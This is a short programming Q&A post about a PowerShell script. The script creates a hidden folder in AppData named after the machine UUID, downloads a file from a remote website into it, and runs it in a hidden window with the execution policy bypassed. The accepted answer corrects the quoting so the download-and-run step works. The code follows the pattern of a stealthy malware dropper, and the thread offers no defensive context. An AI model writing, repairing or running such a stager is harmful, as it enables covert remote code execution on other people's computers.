# execute a script from a created folder with Powershell

Tags: powershell

In powershell i can download a script in a specific random name created  folder but i cannot find the right way to execute the script from there.Here the code that i used:

```
$uuid=(Get-WmiObject Win32_ComputerSystemProduct).UUID;
$path = $env:appdata+'\'+$uuid; $h=$path+'\d';  
if(!(test-path $path)) { New-Item -ItemType Directory -Force -Path 
$path;};
Invoke-WebRequest mywebsitefordownloadingscript -OutFile $path\\test.txt;
start-process -Windowstyle hidden cmd '/C 
'powershell.exe' -exec bypass $path\\test.txt';
```

there was something missing in last  string maybe the problem persist if i use '+$path+' too.

Any suggestions??

Answer (score 3, accepted):

The problem is your single quotes on the last two lines. Since you have enclosed `$path` within single quotes it is not expanded and is taken literally. Change to double quotes to expand the variable, and this should work.

```
$uuid=(Get-WmiObject Win32_ComputerSystemProduct).UUID
$path = $env:appdata+'\'+$uuid
$h=$path+'\d'
if(!(test-path $path)) { 
    New-Item -ItemType Directory -Force -Path $path
}
Invoke-WebRequest mywebsitefordownloadingscript -OutFile $path\\test.txt
start-process -Windowstyle hidden cmd "/C 'powershell.exe' -exec bypass $path\\test.txt"
```